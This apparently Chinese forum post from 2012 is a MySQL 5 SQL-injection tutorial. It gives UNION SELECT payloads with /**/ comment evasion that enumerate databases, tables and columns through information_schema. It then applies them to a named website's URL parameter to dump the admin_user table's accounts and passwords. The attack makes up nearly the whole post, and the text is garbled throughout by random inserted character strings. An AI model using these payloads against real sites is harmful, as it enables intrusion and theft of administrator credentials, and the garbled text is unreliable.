查库
7 V1 z: j. K' U4 r% W7 u9 i* G! v' L: J, e% z# a6 i
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*! G5 g/ N- C5 R1 ^3 Z; t
$ H1 q. [ X% g, y1 Z查表) M1 u5 I/ n( j y- I% o( X
; j$ N. o |- a3 K5 Y
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,19 e# F" s+ V& _' ^8 Z$ S' p
/ d9 u5 Y6 q3 y: D% X" E. [( Q: k! H查段9 E: N7 E! x' }8 n! M; Q. V
[( l U6 k- s1 zid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,11 C, o9 `2 X9 q* V7 f* a" a
% h3 M/ `: ^/ |7 @) g; }$ g: m! \' y2 \
0 u4 R7 r4 P& j9 D6 d8 ^mysql5高级注入方法暴表# M% X5 O- q+ `0 q# a
; i- i4 k7 S8 n5 F6 T: [
例子如下:
2 P: m8 F3 N2 j) s: i2 ?1 a
! q( i9 q* u4 Y& y' |1.爆表
7 c! i7 q7 C! u) J. }/ phttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
# u8 x+ y1 L! |! b这样爆到第4个时出现了admin_user表。( [! ~! _* y5 @* F1 L3 @
5 w* d, g5 T/ A% b0 z6 k2.暴字段, O: v# [3 _# L6 O* W( y+ X
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
2 p3 B" I1 @# X v, ~7 Z( j; S7 k3 t/ z
* w: B+ d- }" f& o% x% M+ G7 B8 j: @* D7 |% o2 [" q
3.爆密码, u' {5 k! V0 I- L; ?/ |( w
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 3 ?* H- ~3 G( _7 y$ T2 Z% m& a
6 Z9 p/ j7 M9 W! D. C7 z% r/ i. c
9 u6 b1 P3 T. |/ ^ |
发表于 2012-9-13 16:29:37
收藏
支持
反对